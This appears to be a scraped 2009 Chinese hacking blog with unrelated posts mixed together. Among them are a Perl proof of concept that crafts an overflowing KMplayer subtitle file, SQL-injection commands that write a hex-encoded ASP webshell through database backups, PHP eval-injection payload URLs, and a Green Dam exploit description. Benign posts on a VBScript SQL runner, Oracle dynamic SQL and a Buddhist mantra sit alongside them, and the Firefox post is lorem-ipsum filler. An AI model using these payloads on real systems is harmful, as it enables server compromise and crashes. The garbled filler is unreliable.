SHAKA

KMplayer <= 2.9.4.1433 (.srt File) Local Buffer Overflow PoC

506966@qq.com(SHAKA) — Tue, 21 Jul 2009 14:38:14 GMT

#!usr/bin/perl
######################## In The Name Of Allah ####################
#
# The KMplayer (.Srt) File Local Bof Poc
#
#
#Author : b3hz4d (Seyed Behzad Shaghasemi)
#Site : Www.Pentesters.Ir
#Tested on KMplayer <= 2.9.4.1433
#Special Thanks : Navid, Hossein, Hooshang, Mahmood, Mohammad and all members in Pentesters.ir
#Greetings : Shahriyar && Alireza && Soroush and all iranian hackers
#
######################### Www.Pentesters.Ir ######################$junk="A"x 90000;
open(fhandle,">SubTitle.srt");
print fhandle "1"."\n"."00:00:25,100 --> 00:00:30,900"."\n"."$junk\n"."-pentesters\n";
print fhandle "2"."\n"."00:00:31,100 --> 00:00:35,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "3"."\n"."00:00:36,100 --> 00:00:40,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "4"."\n"."00:00:41,100 --> 00:00:45,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "5"."\n"."00:00:46,100 --> 00:00:50,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "6"."\n"."00:00:51,100 --> 00:00:55,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
close(fhandle);

Mozilla Firefox 3.5 Remote Buffer Overflow Exploit

506966@qq.com(SHAKA) — Wed, 15 Jul 2009 10:16:11 GMT

Firefox 3.5 VulnerabilityFirefox 3.5 Heap Spray Vulnerabilty
Author: SBerry aka Simon Berry-Byrne
Thanks to HD Moore for the insight and Metasploit for the payload

Loremipsumdoloregkuw

Loremipsumdoloregkuwiert

Loremikdkw

db备份shell的改进2点

506966@qq.com(SHAKA) — Mon, 15 Jun 2009 04:46:06 GMT

减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
加一个参数WITH DIFFERENTIAL
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0×77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0×3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0×65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
二利用完全FORMAT
加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就几倍的增加，所以
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0×77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0×3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0×65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
id=1;backup database model to disk='你的路径‘ with differential,format;--

国外黑客网站发布绿坝最新漏洞攻击程序Green Dam 3.17 (URL) Remote Buffer Overflow

506966@qq.com(SHAKA) — Mon, 15 Jun 2009 04:30:57 GMT

Green Dam remote buffer overflow exploit

"Green Dam" is a software used for monitoring and anti-pornography, popularizing by Chinese goverment. After July 1st, it will be forced to install on all new Chinese PCs.
Now it already has 50 million copies in China.
In order to monitor the URL that user is exploring, Green Dam injected the browser process. When Green Dam is trying to handle a long URL, a stack overflow will occur in the browser process.

This exploit can be used for exploitation on IE, on those computers installed Green Dam.
I used the .net binary to deploy shellcode, for it`s more stable than Heap Spray, and able to bypass DEP and ASLR on Vista.
The exploit page contains a .net control, so it should be published on IIS.
---seer[N.N.U]

vbs做的sql脚本执行工具

506966@qq.com(SHAKA) — Wed, 10 Jun 2009 19:40:13 GMT

'##################执行多目录下的所有sql脚本的工具#################################
'#可以方便的执行指定的目录或文件到多个服务器多个数据库
'#只会执行以“.sql”后缀的脚本文件
'#执行返回结果会生成报告以文本文件打开
'【请在此过程中填写运行参数】
Sub todo
Dim execTool
Set execTool=new MySqlScriptExecTool
'使用步骤：
'一、指定需要执行脚本的服务器，分别为：目标服务器的ip、数据库名、数据库用户名、数据库密码
execTool.addDatabaseLink "192.168.1.116","dbname","username","pwd"
'如果需要添加多个不同的服务器或者数据库，可以模仿如下方法继续添加
'execTool.addDatabaseLink "192.168.1.116","dbname2","username","pwd"
'二、指定需要执行的脚本所在的目录：这样在最终执行前会搜索出具体的需要执行的文件，可以写多条类似语句添加多个目录
execTool.addFold "F:\exec\sql"
'execTool.addFold "D:\drp\DEV\db\SQLServer\report"
'三、如果同时需要执行目录下面有子目录的脚本则需要去掉下面这句话前面的“'”
'execTool.searchChildFolds()'迭代找出所有子目录
'找出指定目录里面的sql脚本
execTool.searchFiles()
'四、也可以单独需要执行的文件
'execTool.addFile("D:\drp\DEV\db\SQLServer\common\init.sql")
'开始执行脚本到服务器
execTool.execSqlScript()
End Sub

Class MySqlScriptExecTool
'属性
Public folds()'sql语句所在目录
Public files()'文件
Public logoutFile'日志输出文件
Private fso
Private WshShell
'Private tempRstFileName
Private currentFolder'当前目录
Private DBserver()'指定数组大小则后面不能该大小了，要改大小的时候报错：该数组为定长的或临时被锁定
Private databaseName()
Private username()
Private password()
'初始化
Private Sub Class_Initialize
ReDim folds(0)
ReDim files(0)
ReDim DBserver(0)
ReDim databaseName(0)
ReDim username(0)
ReDim password(0)
Set fso = Wscript.CreateObject("Scripting.FileSystemObject")
set WshShell = WScript.CreateObject("WScript.Shell")
strPath = Wscript.ScriptFullName
objFile = fso.GetFile(strPath)
currentFolder = fso.GetParentFolderName(objFile)
logoutFile = currentFolder + "\SqlScriptExecTool_Log.txt"
End Sub

'添加目标数据库
Public function addDatabaseLink(DBserverip,dbname, usenme2, pwd)
length = UBound(DBserver)
DBserver(length) = DBserverip: ReDim Preserve DBserver(length + 1)
databaseName(length) = dbname: ReDim Preserve databaseName(length + 1)
username(length) = usenme2: ReDim Preserve username(length + 1)
password(length) = pwd: ReDim Preserve password(length + 1)
end Function
'创建文件，存在则覆盖
Public function createNewFile(dscFile, msgs)
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim f
Set f = fso.OpenTextFile(dscFile, ForWriting, True)
f.Write msgs
f.Close
End Function
'追加文件
Public function appendToFile(dscFile, msgs)
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim f
Set f = fso.OpenTextFile(dscFile, ForAppending, True)
f.Write msgs
f.Close
End Function
'读运文本文件内容
Private Function readTxtFile(file_path)
Const ForReading = 1, ForWriting = 2
Dim MyFile
Set MyFile = fso.OpenTextFile(file_path, ForReading)
readTxtFile = MyFile.ReadAll()
MyFile.Close
End Function

'添加目录，有避免重复的检查
Public function addFold(fold)
If fso.FolderExists(fold)=False Then
MsgBox "文件夹"+fold+"不存在！"
Exit Function
End If
length = UBound(folds)
For i = 0 To length - 1
If fold = folds(i) Then Exit Function
Next
folds(length) = fold: ReDim Preserve folds(length + 1)
end Function
'添加文件，有避免重复的检查
Public function addFile(file)
If fso.FileExists(file)=False Then
MsgBox "文件"+file+"不存在！"
Exit Function
End If
'If isSqlScriptFile(file) = false Then Exit Function
length = UBound(files)
For i = 0 To length - 1
If file = files(i) Then Exit Function
Next
files(length) = file: ReDim Preserve files(length + 1)
end Function

Public function isSqlScriptFile(file)
If Len(file) > 4 And UCase(Right(file,4)) = ".SQL" Then
isSqlScriptFile = true
Exit Function
End If
isSqlScriptFile = false
end Function

'找出目录下的sql文件
Public function searchFiles()
length = UBound(folds)
For i = 0 To length - 1
file_path = folds(i)
'MsgBox "分析文件 "+CStr(i)+"="+folds(i)
If fso.FolderExists(file_path) = true Then
'MsgBox "存在的!"
Dim fold
Set fold = fso.GetFolder(file_path)
'If fold.files.Count > 0 Then
For Each flde In fold.files
If isSqlScriptFile(flde.Path) Then
'MsgBox flde.Path 'Name Path
addFile flde.Path
End If
Next
'End If
Else
MsgBox "目录 " + file_path + "不存在！"
End If
Next
end Function

'找出所有目录
Public function searchChildFolds()
'If searchChildFold = False Then Exit Function
length=UBound(folds)+1
For i=length-1 To 0 Step -1
file_path=folds(i)
'MsgBox "分析文件 "+CStr(i)+"="+folds(i)
If fso.FolderExists(file_path)=true Then
'MsgBox "存在!"
Dim fold
Set fold = fso.GetFolder(file_path)
ListAllChildFolds fold
End If
Next
end Function

'迭代找出所有子文件夹
Public function ListAllChildFolds(fold)
If fold.SubFolders.Count =0 Then Exit Function
For Each subFolder In fold.SubFolders'fold.Files
'将子层目录加入待处理目录
'MsgBox subFolder.Path
addFold subFolder.Path
Dim childFold
Set childFold = fso.GetFolder(subFolder.Path)
ListAllChildFolds childFold
Next
end Function
Private Function getTempRstFileName(index, scriptName, serverName, databaseName)
'getTempRstFileName = currentFolder + "\" + CStr(index) + "@" + serverName + "@" + databaseName + "@" + scriptName + ".txt"
getTempRstFileName = currentFolder + "\" + serverName + "@" + databaseName + "@" + scriptName + ".txt"
End Function
Public function execSqlScript()
'创建日志文件
createNewFile logoutFile, "执行sql脚本，开始于："+CStr(Date())+" "+CStr(Time())+vbCrLf+"=============================================================="+vbCrLf

Dim tmprstfilepathIdx, tmpFileName

'1.执行
tmprstfilepathIdx = 0
For sIndex = 0 To UBound(DBserver) - 1
For i =0 To UBound(files) - 1
tmprstfilepathIdx = tmprstfilepathIdx + 1
tmpFileName = getTempRstFileName(tmprstfilepathIdx, fso.GetBaseName(files(i)), DBserver(sIndex), databaseName(sIndex))
runsql="isqlw -S " + DBserver(sIndex) + " -d " + databaseName(sIndex) + " -U " + username(sIndex) + " -P " + password(sIndex) + " -i "+files(i)+" -o " + tmpFileName
'MsgBox runsql
WshShell.Run runsql
WScript.Sleep 1000'预留的执行空闲等待
Next
Next
'2.log合并
tmprstfilepathIdx = 0
Dim newmsg
For sIndex = 0 To UBound(DBserver) - 1
For i =0 To UBound(files) - 1
tmprstfilepathIdx = tmprstfilepathIdx + 1
tmpFileName = getTempRstFileName(tmprstfilepathIdx, fso.GetBaseName(files(i)), DBserver(sIndex), databaseName(sIndex))
Dim runRst
runRst = readTxtFile(tmpFileName)
WScript.Sleep 450
newmsg = ""
If i <> 0 And sIndex <> 0 Then
newmsg = vbCrLf + vbCrLf
End If
newmsg = newmsg + "执行序号：" + CStr(tmprstfilepathIdx)
newmsg = newmsg + vbCrLf + "目标：" + databaseName(sIndex) + "@" + DBserver(sIndex)
newmsg = newmsg + vbCrLf + "执行脚本：" + fso.GetBaseName(files(i)) + ".sql"
newmsg = newmsg + vbCrLf + "执行结果:" + vbCrLf + runRst + vbCrLf
appendToFile logoutFile, newmsg
WScript.Sleep 500
fso.DeleteFile(tmpFileName)
Next
Next

'日志记录结束时间
appendToFile logoutFile, vbCrLf + "==============================================================" + vbCrLf + "执行sql脚本，结束于：" + CStr(Date()) + " " + CStr(Time())

'用记事本打开日志文件
WshShell.Run "notepad " + logoutFile
end Function

Public function showFolds()
For i = 0 To UBound(folds) - 1
MsgBox CStr(i) + "=" + folds(i)
Next
end Function
Public function showFiles()
For i = 0 To UBound(files) - 1
MsgBox CStr(i) + "=" + files(i)
Next
end function

End Class

todo

PHP的一个EVAL

506966@qq.com(SHAKA) — Wed, 10 Jun 2009 19:35:07 GMT

by:http://www.phpeval.cn/
前段时间一个程序出的问题。就和这差不多。

$code="${${eval($_GET[c])}}";
?>

对于上面的代码。如果在URL提交http://www.phpeval.cn/test.php?c=phpinfo(); 就可以发现phpinfo()被执行了。而相应的提交c=echo 11111; 发现1111也被输出了。这个代码被执行了。
(好些PHP的代码在写文件的时候。都没有注意到这一点。他们在代码中写php的文件的时候。把代码加在双引号之内。然后过滤掉双引号。认为这样就不能执行了。实际上是可以的。by: phpeval)
还有一些利用方式，比如：

$code=addslashes($_GET['c']);
eval("$code");
?>

提交 http://www.phpeval.cn/test.php?c=${${phpinfo()}}; phpinfo()就被执行。如果提交 http://www.phpeval.cn/test.php?c=${${eval($_GET[d])}};&d=phpinfo(); 这样的话 d后面的代码也被执行。

在发文时。本连接已经删除。各位只有另外找地方测试了。

Oracle UNION ALL UNION

506966@qq.com(SHAKA) — Wed, 10 Jun 2009 19:30:43 GMT

1.在查询中会遇到 UNION ALL,它的用法和union一样,只不过union含有distinct的功能,它会把两张表了重复的记录去掉,而union all不会,所以从效率上,union all 会高一点.
2.union all 是按原先顺序排列的，union 把两张表中的重复数据去掉后还进行了重新排序
声明：此文来源于网路！
内容摘要：在PL/SQL开发过程中，使用SQL，PL/SQL可以实现大部份的需求，但是在某些特殊的情况下，在PL/SQL中使用标准的SQL语句或DML语句不能实现自己的需求，比如需要动态建表或某个不确定的操作需要动态执行。这就需要使用动态SQL来实现。本文通过几个实例来详细的讲解动态SQL的使用。　　

　　本文适宜读者范围：Oracle初级，中级

　　系统环境：

　　　OS：windows 2000 Professional (英文版)

　　　Oracle：8.1.7.1.0

　　正文：

　　一般的PL/SQL程序设计中，在DML和事务控制的语句中可以直接使用SQL，但是DDL语句及系统控制语句却不能在PL/SQL中直接使用，要想实现在PL/SQL中使用DDL语句及系统控制语句，可以通过使用动态SQL来实现。

　　首先我们应该了解什么是动态SQL，在Oracle数据库开发PL/SQL块中我们使用的SQL分为：静态SQL语句和动态SQL语句。所谓静态 SQL指在PL/SQL块中使用的SQL语句在编译时是明确的，执行的是确定对象。而动态SQL是指在PL/SQL块编译时SQL语句是不确定的，如根据用户输入的参数的不同而执行不同的操作。编译程序对动态语句部分不进行处理，只是在程序运行时动态地创建语句、对语句进行语法分析并执行该语句。

　　Oracle中动态SQL可以通过本地动态SQL来执行，也可以通过DBMS_SQL包来执行。下面就这两种情况分别进行说明：

　　一、本地动态SQL

　　本地动态SQL是使用EXECUTE IMMEDIATE语句来实现的。

　　1、本地动态SQL执行DDL语句：

　　需求：根据用户输入的表名及字段名等参数动态建表。

create or replace procedure proc_test
(
table_name in varchar2, --表名
field1 in varchar2, --字段名
datatype1 in varchar2, --字段类型
field2 in varchar2, --字段名
datatype2 in varchar2 --字段类型
) as
str_sql varchar2(500);
begin
str_sql:=’create table ’||table_name||’(’||field1||’ ’||datatype1||’,’||field2||’ ’||datatype2||’)’;
execute immediate str_sql; --动态执行DDL语句
exception
when others then
null;
end ;
　　以上是编译通过的存储过程代码。下面执行存储过程动态建表。

SQL> execute proc_test(’dinya_test’,’id’,’number(8) not null’,’name’,’varchar2(100)’);

PL/SQL procedure successfully completed

SQL> desc dinya_test;
Name Type Nullable Default Comments
---- ------------- -------- ------- --------
ID NUMBER(8)

NAME VARCHAR2(100) Y

SQL>
　　到这里，就实现了我们的需求，使用本地动态SQL根据用户输入的表名及字段名、字段类型等参数来实现动态执行DDL语句。

　　2、本地动态SQL执行DML语句。

　　需求：将用户输入的值插入到上例中建好的dinya_test表中。

create or replace procedure proc_insert
(
id in number, --输入序号
name in varchar2 --输入姓名
) as
str_sql varchar2(500);
begin
str_sql:=’insert into dinya_test values(:1,:2)’;
execute immediate str_sql using id,name; --动态执行插入操作
exception
when others then
null;
end ;
　　执行存储过程，插入数据到测试表中。

SQL> execute proc_insert(1,’dinya’);
PL/SQL procedure successfully completed
SQL> select * from dinya_test;
ID NAME
1 dinya
　　在上例中，本地动态SQL执行DML语句时使用了using子句，按顺序将输入的值绑定到变量，如果需要输出参数，可以在执行动态SQL的时候，使用RETURNING INTO 子句，如：

declare
p_id number:=1;
v_count number;
begin
v_string:=’select count(*) from table_name a where a.id=:id’;
execute immediate v_string into v_count using p_id;
end ;
　　更多的关于动态SQL中关于返回值及为输出输入绑定变量执行参数模式的问题，请读者自行做测试。

　　二、使用DBMS_SQL包

　　使用DBMS_SQL包实现动态SQL的步骤如下：A、先将要执行的SQL语句或一个语句块放到一个字符串变量中。B、使用DBMS_SQL包的 parse过程来分析该字符串。C、使用DBMS_SQL包的bind_variable过程来绑定变量。D、使用DBMS_SQL包的execute函数来执行语句。

　　1、使用DBMS_SQL包执行DDL语句

　　需求：使用DBMS_SQL包根据用户输入的表名、字段名及字段类型建表。

create or replace procedure proc_dbms_sql
(
table_name in varchar2, --表名
field_name1 in varchar2, --字段名
datatype1 in varchar2, --字段类型
field_name2 in varchar2, --字段名
datatype2 in varchar2 --字段类型
)as
v_cursor number; --定义光标
v_string varchar2(200); --定义字符串变量
v_row number; --行数
begin
v_cursor:=dbms_sql.open_cursor; --为处理打开光标
v_string:=’create table ’||table_name||’(’||field_name1||’ ’||datatype1||’,’||field_name2||’ ’||datatype2||’)’;
dbms_sql.parse(v_cursor,v_string,dbms_sql.native); --分析语句
v_row:=dbms_sql.execute(v_cursor); --执行语句
dbms_sql.close_cursor(v_cursor); --关闭光标
exception
when others then
dbms_sql.close_cursor(v_cursor); --关闭光标
raise;
end;
　　以上过程编译通过后，执行过程创建表结构：

SQL> execute proc_dbms_sql(’dinya_test2’,’id’,’number(8) not null’,’name’,’varchar2(100)’);

PL/SQL procedure successfully completed

SQL> desc dinya_test2;
Name Type Nullable Default Comments
---- ------------- -------- ------- --------
ID NUMBER(8)
NAME VARCHAR2(100) Y

SQL>
　　2、使用DBMS_SQL包执行DML语句

　　需求：使用DBMS_SQL包根据用户输入的值更新表中相对应的记录。

　　查看表中已有记录：

SQL> select * from dinya_test2;
ID NAME
1 Oracle
2 CSDN
3 ERP
SQL>
　　建存储过程，并编译通过：

create or replace procedure proc_dbms_sql_update
(
id number,
name varchar2
)as
v_cursor number; --定义光标
v_string varchar2(200); --字符串变量
v_row number; --行数
begin
v_cursor:=dbms_sql.open_cursor; --为处理打开光标
v_string:=’update dinya_test2 a set a.name=:p_name where a.id=:p_id’;
dbms_sql.parse(v_cursor,v_string,dbms_sql.native); --分析语句
dbms_sql.bind_variable(v_cursor,’:p_name’,name); --绑定变量
dbms_sql.bind_variable(v_cursor,’:p_id’,id); --绑定变量
v_row:=dbms_sql.execute(v_cursor);　　　　　　　　　　　--执行动态ＳＱＬ
dbms_sql.close_cursor(v_cursor); --关闭光标
exception
when others then
dbms_sql.close_cursor(v_cursor); --关闭光标
raise;
end;
　　执行过程，根据用户输入的参数更新表中的数据：

SQL> execute proc_dbms_sql_update(2,’csdn_dinya’);

PL/SQL procedure successfully completed

SQL> select * from dinya_test2;
ID NAME
1 Oracle
2 csdn_dinya
3 ERP
SQL>
　　执行过程后将第二条的name字段的数据更新为新值csdn_dinya。这样就完成了使用dbms_sql包来执行DML语句的功能。

　　使用DBMS_SQL中，如果要执行的动态语句不是查询语句，使用DBMS_SQL.Execute或 DBMS_SQL.Variable_Value来执行，如果要执行动态语句是查询语句，则要使用DBMS_SQL.define_column定义输出变量，然后使用DBMS_SQL.Execute, DBMS_SQL.Fetch_Rows, DBMS_SQL.Column_Value及DBMS_SQL.Variable_Value来执行查询并得到结果。

　　总结说明：

　　在Oracle开发过程中，我们可以使用动态SQL来执行DDL语句、DML语句、事务控制语句及系统控制语句。但是需要注意的是，PL/SQL块中使用动态SQL执行DDL语句的时候与别的不同，在DDL中使用绑定变量是非法的（bind_variable(v_cursor,’:p_name’,name)），分析后不需要执行DBMS_SQL.Bind_Variable，直接将输入的变量加到字符串中即可。另外，DDL是在调用DBMS_SQL.PARSE时执行的，所以DBMS_SQL.EXECUTE也可以不用，即在上例中的v_row:=dbms_sql.execute(v_cursor)部分可以不要。

往生咒

506966@qq.com(SHAKA) — Tue, 09 Jun 2009 06:05:56 GMT

往生咒简介

此神咒全称“拔一切业障根本得生净土陀罗尼”，简称往生咒，是《早晚课诵集》中十小咒之一。焚香跪拜佛像，合掌念诵此咒，日夜各二十一遍，能灭五逆、十恶、谤法等重罪。诚心念此咒，阿弥陀佛常在头上保佑，怨家不能伤害，可享安乐之福。

最大效用：佛光普照，事事顺利，吉祥如意，幸福平安。持此咒须身口意悉皆清净，虔诚持念，即能消灭五逆十恶谤法等重罪，并常有阿弥陀佛，在其头顶以护行人，现世享安乐，临终往生阿弥陀佛的西方极乐净土。

往生咒原文及注音神咒原文：

南无阿弥多婆夜。哆他伽多夜。哆地夜他。

　　阿弥利都婆毗。阿弥利哆。悉耽婆毗。

　　阿弥唎哆。毗迦兰帝。阿弥唎哆。毗迦兰多。

　　伽弥腻。伽伽那。枳多迦利。娑婆诃。　　

往生净土神咒注音：

nā mó ā mí duō pó yè。duō tuō qié duō yè。duō dì yè tuō。

　　ā mí lì dū pó pí。ā mí lì duō。xī dān pó pí。

　　ā mí lì duō。pí jiā lán dì。ā mí lì duō。pí jiā lán duō。

　　qié mí nì。qié qié nuó。zhǐ duō jiā lì。suō pó hē。

　　发音注解：

　　南无：发音（nā mó），今人多读成南（ná拿）无（mó摩）。

　　阿：应该读成（ā啊），“阿弥多婆夜”梵译实际上是“阿弥陀佛”的意思。

　　他：古音读（tuō托）、（tuó陀）。

　　伽：读（qié茄）。

　　都：咒内此处读音为（dū督）。

　　毗：发音为（pí皮）。

　　耽：读作（dān丹）。

　　迦：读（jiā加）。

　　腻：读音（nì逆）。

　　伽伽那：“那”读成（nuó古音“娜”）。

　　枳：发音（zhǐ止）。

往生咒功德利益　　

【一】此咒全名「拔一切业障根本得生净土陀罗尼」。若有善男子、善女人，能诵此咒者，阿弥陀佛常住其顶，日夜拥护，无令怨家而得其便，现世常得安隐，临命终时任运往生。

　　【二】诵此咒者。阿弥陀佛常住其顶，命终之后，任运往生。龙树菩萨愿生安养（西方极乐世界），梦感此咒。耶舍三藏诵此咒，天平等銹法师从耶舍三藏口受此咒。其人云：经本外国不来，受持咒法，日夜六时，各诵三七遍，晨夜藻漱嚼扬枝然香火，于形象前跪，合掌诵三七遍，日日恒尔，即灭四重、五逆、十恶、谤方等罪悉得除灭。现在不为一切诸邪鬼神之所恼乱，命终之后，任运往生阿弥陀国，何况昼夜受持诵读，功德不可思议！

　　【三】诵此咒者。阿弥陀佛常住其顶。不令冤家为害。现世安稳。命终任意往生。若满二十万遍。即菩提芽生。三十万遍。非久面见阿弥陀佛。晋时远法师诵此咒。有神人。从西持白银台来云。法师寿终。当乘此往生阿弥陀佛国。众人闻空中如奏音乐。异香数日不歇。

　　【四】《法苑珠林》卷60：「此之神呪先已流行。功能利益不可说尽。于晨朝时用杨枝净口散华烧香。佛像前胡跪合掌。口诵七遍。若二七三七遍。灭四重五逆等罪。现身不为诸横所恼。命终生无量寿国。又此呪能转女身令成男子。今别勘梵本。并问真婆罗门僧等。此呪威力不可思议。但旦暮午时各诵一百遍。能灭四重五逆。拔一切罪根得生西方。若能精诚满二十万遍。则菩提芽生得不退转。诵满三十万遍。则面见阿弥陀佛。决定得生安乐净土。」

　　拔一切业障根本得生净土陀罗尼，是出于《小无量寿经》（刘宋天竺三藏求那跋陀罗译）与《佛说阿弥陀佛根本秘密神咒经》（曹魏三藏菩提流支译）。它完整的名称是：《拔一切业障根本得生净土陀罗尼》，又名《阿弥陀佛根本秘密神咒》，通常称为《往生咒》。

　　拔一切业障根本得生净土：众生为什么会流浪生死，在三界六道中轮回不息呢？就是因为业障重。这些业障从那里来的呢？就是因为有贪嗔痴等烦恼，造了杀盗淫妄种种的恶业，这些恶业的种子慢慢滋长，形成了众生受苦的原因，循环不息，没有了期。我们想把这些业障的烦恼根本拔起，不受轮回的痛苦，就要虔诚地持诵往生咒。往生咒能帮助我们拔掉一切业障的根本，使烦恼不再生起来，在世时自然幸福快乐，将来必定会往生西方极乐世界。

　　陀罗尼：梵语，译成中文就是‘咒’，意思是‘总持’。‘总’一切法，‘持’无量义。意思是说，咒语虽然只有几个字，但是能把一切佛法的意义都包含了，可见咒的功德是无量的。

　　平常我们一提到往生咒，一般人望文生义，总以为那是我们在临命终时才用得著，对现实的人生，不但不相干，而且还是不吉利的。这种想法，实在是错误的！我们了解了往生咒真正的定义以后，就知道往生咒是拔除一切业障的神咒，时时常念，阿弥陀佛会照顾我们，除了临终可以帮助我们往生，在现实人生更使我们得到平安幸福。它那不可思议的殊胜功德，实在是‘冥阳两利’的！

　　《小无量寿经》与《佛说阿弥陀佛根本秘密神咒经》都有这样的记载：‘如果有善男子、善女人，能持诵这咒语，阿弥陀佛时常住在他的头顶，日夜拥护他，以免受到怨家的逼迫和恼害，现世经常得到平安幸福，临命终时，阿弥陀佛及圣众会来接引，可以自由自在地往生净土。’可见称念往生咒的人，不管是在生或往生，都有很大的利益。

　　隋朝流传下来的《阿弥陀经不思议神力传》中记述了持咒的方法和利益：‘如果我们要持诵往生咒，应该清净三业，沐浴，漱口，至诚一心，在佛前燃香，长跪合掌，日夜各诵念二十一遍，就可以消灭四种严重的罪过（杀人、偷盗、邪淫、大妄语）、五逆罪（杀父、杀母、杀阿罗汉、出佛身血、破和合僧）、十种恶业（杀生、偷盗、邪淫、妄语、恶口、两舌、绮语、贪爱、憎恨、愚痴），甚至连毁谤大乘经典的罪业，都能够消除。现世一切所求，都能如意获得，不被邪恶的鬼神所迷惑和扰乱。如果有恒心地持诵了二十万遍，就会萌生智慧的苗芽。如果念了三十万遍，就能亲自看见阿弥陀佛。’

　　因此我们修净土法门的人，在持念阿弥陀佛的圣号以外，如果能同时兼诵念往生咒，生前可拔除一切业障，临终必定能往生极乐国土。

　　我们每天究竟要念多少往生咒呢？这要看各人的环境和时间而作决定；如果环境许可，时间充裕，不妨经常持诵，希望能早日达到三十万遍的最高目标。不然，就得自己酌量规定一个数目，但至少每天早晚要诵持二十一遍，必须持之以恒，日久自然获得殊胜的效果。

　　现在流行的往生咒，一般称为《往生净土神咒》，共有五十九个字，一共有十四句，也有说是分为十五句的。说实在的，所有的咒是不可以解释的，只是翻音，没有翻义，字是中文，音仍然是梵语。字义既然没有翻译，就不知究竟是讲些什么了。但是为了让诸位对所念咒语的意思，多多少少有所了解，我就方便地、勉强地加以说明一下，并没有把全部的意思讲出来。

　　南无阿弥多婆夜皈命无量寿。（吉祥的）

　　多他伽多夜如来。（佛的十种称号之一）

　　多地夜他即说咒曰。（所谓）

　　阿弥利都婆毗无量光明。（智慧身佛）

　　阿弥利多无量

　　悉耽婆毗吉祥光。（功德身佛）

　　阿弥利多无量

　　毗迦兰帝无碍行。（应化身佛。表示自由自在。）

　　阿弥利多无量

　　毗迦兰多无垢行。（如如身佛。表示无限清净。）

　　伽弥腻清泰故乡。（清净安泰幸福的极乐世界，是我们真正的归宿。）

　　伽伽那虚空。（空间，指从娑婆到极乐世界之间的十万亿佛土。）

　　枳多迦利坚往谛往生。（有坚强的信念，相信只要有诚心，一定能往生。）

　　莎婆诃速疾圆成。（很快达成目的。）

　　为什么咒语不翻译呢？密咒，是五种不翻中的秘密不翻。咒，是诸佛、菩萨的‘密语’，既然是密语，就是在印度也不能解释的。只要具足信心，虔诚持诵，不必了解意思，日久自然感应道交，在冥冥之中获得不可思议的效益。

百度空间的自定义模板XSS漏洞的利用

506966@qq.com(SHAKA) — Thu, 04 Jun 2009 08:34:30 GMT

有些XSS不好利用啊，比如有些后台的XSS漏洞，你进不了别人的后台，怎么能利用他的XSS漏洞呢？进得了别人的后台，还利用这个XSS漏洞干什么？其实这个时候可以种个后门（如果那是个持久型的XSS，这是后话）。有些被称为鸡肋的XSS漏洞其实很多时候是因为没有找到合适的利用方式而已。

比如百度空间的自定义模板处，那里还有两处持久型的XSS漏洞，一个是在编辑CSS的textarea中写入这样的代码